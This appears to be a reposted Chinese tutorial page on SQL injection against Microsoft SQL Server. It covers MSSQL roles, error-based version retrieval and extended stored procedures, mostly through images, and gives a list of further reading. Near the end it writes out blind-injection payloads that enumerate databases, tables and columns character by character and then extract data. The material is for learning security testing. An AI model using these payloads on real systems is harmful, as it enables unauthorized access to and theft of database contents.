DAY8:SQL注入7-SQLserver
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了DAY8:SQL注入7-SQLserver,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2650字,纯文字阅读大概需要4分钟。
内容图文
![DAY8:SQL注入7-SQLserver](/upload/InfoBanner/zyjiaocheng/888/2a86fbd4a8a442e99a7fd42785c35432.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023038727.jpg)
? 二、MSSQL权限控制 1. MSSQL角色
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023039432.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023140227.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023141770.jpg)
3. 固定服务器角色(sysadmin简称sa,是服务器角色的最高权限)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023142760.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023143717.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023144884.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023145876.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023146821.jpg)
2. 获取数据库版本,利用的是报错注入
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023147874.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023148793.jpg)
4. 扩展存储过程
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023149864.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023150644.jpg)
5. 检测与恢复扩展存储
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023151804.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023152824.jpg)
![DAY8:SQL注入7-SQLserver - 文章图片](/upload/getfiles/0001/2021/5/8/20210508023153650.jpg)
8. 课后阅读 MSSQL注入方式进阶 https://www.waitalone.cn/sqlserver-inject-skills.html https://www.freebuf.com/articles/web/55577.html MSSQL注入总结 https://blog.51cto.com/maxvision/1691962 MSSQL报错注入 http://blog.nsfocus.net/mssql-order-by/ MSSQL union注入 https://www.cnblogs.com/mynona/p/3622863.html MSSQL的union注入时,每一列的类型要相同,若不知道类型就用null MSSQL盲注 ①查数据库个数 and (select count(name) from master.sys.databases)=7 ②查当前数据库名 and ascii(substring((db_name()),1,1))>48 ③查所有数据库名 and ascii(substring((select name from master.dbo.sysdatabases where dbid=1),1,1))>48 and ascii(substring((select top 1 name from master.dbo.sysdatabases where name not in ('第一个库名', '第二个库名',,,,,,’第N-1个数据库名’)),N,1)) >= 56 ④查表名 and ascii(substring((select top 1 name from 数据库名.sys.sysobjects where xtype = 'U' and name not in ('第一个表名','第二个表名',,,,,,'第N-1个表名')),N,1)) >= 9 ⑤查列名 and ascii(substring((select top 1 name from 数据库名.sys.syscolumns where id=(select id from 数据库名.sys.sysobjects where xtype='U' and name='表名') and name not in ('第一个列名')),N,1)) >= 65 ⑥获取数据 and ascii(substring((select top 1 列名 from 表名),N,1)) >= 65
? ?
内容总结
以上是互联网集市为您收集整理的DAY8:SQL注入7-SQLserver全部内容,希望文章能够帮你解决DAY8:SQL注入7-SQLserver所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。